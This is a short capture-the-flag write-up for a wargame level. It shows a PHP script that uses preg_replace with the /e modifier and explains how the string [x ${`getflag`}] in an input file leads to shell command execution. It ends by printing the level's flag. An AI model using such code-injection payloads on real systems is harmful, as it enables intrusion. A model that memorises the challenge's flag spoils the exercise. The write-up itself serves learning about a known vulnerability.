Skip to content

Latest commit

 

History

History
32 lines (29 loc) · 1.29 KB

stages.md

File metadata and controls

32 lines (29 loc) · 1.29 KB

level06

  1. We are given level06 binary executable and PHP level06.php file
#!/usr/bin/php
<?php
	function y($m)
	{
		$m = preg_replace("/\./", " x ", $m);
		$m = preg_replace("/@/", " y", $m);
		return $m;
	}

	function x($y, $z)
	{
		$a = file_get_contents($y);
		$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
		$a = preg_replace("/\[/", "(", $a);
		$a = preg_replace("/\]/", ")", $a);
		return $a;
	}

	$r = x($argv[1], $argv[2]);
	print $r;
?>
  1. Code takes filename as input, loads containing of this file, changing it and outputs to console
  2. After short search, preg_replace() revealed to be vulnerable when used with /e modifier: before changing input string, string is executed as PHP-code
  3. Create /tmp/php_exploit. Containing of this file will be string that after PHP modification \[x (.*)\] will result getflag shell command. Needed string is [x ${`getflag`}] (backticks are needed to launch it as shell command)
  4. Launching ./level06 /tmp/php_exploit results to flag for level07: wiok45aaoguiboiki2tuin6ub

< PREVIOUS LEVEL | NEXT LEVEL >

MAIN MENU